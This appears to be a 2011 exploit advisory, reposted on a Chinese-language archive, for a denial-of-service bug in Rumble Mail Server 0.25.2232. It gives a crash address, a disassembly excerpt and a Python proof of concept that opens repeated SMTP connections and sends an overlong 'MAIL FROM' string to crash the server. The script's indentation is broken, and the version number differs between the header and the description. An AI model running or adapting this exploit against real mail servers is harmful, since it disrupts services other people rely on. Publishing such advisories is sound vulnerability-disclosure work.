Rumble 0.25.2232 – Denial of Service

  • 作者: AutoSec Tools
    日期: 2011-03-29
  • 类别:
  • 来源:
  • # ------------------------------------------------------------------------
    # Software................Rumble 0.25.2232
    # Vulnerability...........Denial Of Service
    # Threat Level............Serious (3/5)
    # Download................
    # Discovery Date..........3/27/2011
    # Tested On...............Windows Vista + XAMPP
    # ------------------------------------------------------------------------
    # Author..................AutoSec Tools
    # Site....................
    # Email...................John Leitch <>
    # ------------------------------------------------------------------------
    # --Description--
    # A denial of service vulnerability can be exploited to crash Rumble
    # Mail Server v0.25.2231.
    # rumble_win32.exe: The instruction at 0x96CEEB referenced memory at
    # 0x41414149. The memory could not be read (0x0096CEEB -> 41414149)
    # Disassembly:
    # .text:0096CEEB mov edx, [ecx+8]
    # .text:0096CEEE mov [ebp-8], edx
    # .text:0096CEF1 mov eax, [ebp-8]
    # .text:0096CEF4 mov ecx, [eax]
    # .text:0096CEF6 mov [ebp-0Ch], ecx
    # .text:0096CEF9 mov edx, [ebp+0Ch]
    # .text:0096CEFC mov [ebp-10h], edx
    # .text:0096CEFF
    # .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31
    # .text:0096CEFF mov eax, [ebp-10h]
    # .text:0096CF02 mov cl, [eax]
    # .text:0096CF04 mov [ebp-11h], cl
    # .text:0096CF07 mov edx, [ebp-0Ch]
    # .text:0096CF0A cmp cl, [edx]
    # .text:0096CF0C jnz short loc_96CF3C
    # --PoC--
    import socket
    host = 'localhost'
    tld = 'mydomain.tld'
    port = 25
    def crash():
     for i in range(0, 16):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    junk = 'A' * 4096
    print s.recv(8192)
    s.send('HELO ' + tld + '\r\n')
    print s.recv(8192)
    s.send('MAIL FROM ' + junk + '\r\n') 
    print s.recv(8192)